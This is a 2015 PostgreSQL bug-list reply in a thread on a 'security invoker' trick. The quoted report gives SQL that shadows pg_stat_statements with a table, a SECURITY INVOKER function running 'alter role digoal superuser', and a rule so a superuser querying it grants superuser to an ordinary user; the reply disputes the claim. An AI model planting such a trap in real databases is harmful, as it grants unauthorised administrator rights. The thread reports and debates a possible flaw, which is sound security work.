From: | "David G(dot) Johnston" <david(dot)g(dot)johnston(at)gmail(dot)com> |
---|---|
To: | 德哥 <digoal(at)126(dot)com> |
Cc: | "pgsql-bugs(at)postgresql(dot)org" <pgsql-bugs(at)postgresql(dot)org> |
Subject: | Re: BUG #13651: trigger security invoker attack |
Date: | 2015-09-30 02:01:12 |
Message-ID: | CAKFQuwZkmBiq9fAZHOjEfbOoazzm=NQwvpBvVGtgrgjT__4EhQ@mail.gmail.com |
Views: | Raw Message | Whole Thread | Download mbox | Resend email |
Thread: | |
Lists: | pgsql-bugs |
On Tuesday, September 29, 2015, 德哥 <digoal(at)126(dot)com> wrote:
> a normal user get super privilege, use security invoker function.
> postgres=> create table pg_stat_statements (
> userid oid ,
> dbid oid ,
> queryid bigint ,
> query text ,
> calls bigint ,
> total_time double precision ,
> rows bigint ,
> shared_blks_hit bigint ,
> shared_blks_read bigint ,
> shared_blks_dirtied bigint ,
> shared_blks_written bigint ,
> local_blks_hit bigint ,
> local_blks_read bigint ,
> local_blks_dirtied bigint ,
> local_blks_written bigint ,
> temp_blks_read bigint ,
> temp_blks_written bigint ,
> blk_read_time double precision ,
> blk_write_time double precision );
>
> postgres=> create or replace function f() returns pg_stat_statements as $$
>
> declare
> begin
> alter role digoal superuser;
> end;
> $$ language plpgsql security invoker;
> CREATE FUNCTION
>
> postgres=> create rule "_RETURN" as on select to pg_stat_statements do
> instead select * from f();
> CREATE RULE
>
> When a super user select the view pg_stat_statements , the normal user
> digoal will granted the superuser role.
>
> Yes, it's a normal operation ,but somebody can use these trick.
>
Everything you just wrote was done as superuser so what's your point?
David J.
From | Date | Subject | |
---|---|---|---|
Next Message | 德哥 | 2015-09-30 02:06:35 | Re: BUG #13651: trigger security invoker attack |
Previous Message | 德哥 | 2015-09-30 01:16:26 | Re: BUG #13651: trigger security invoker attack |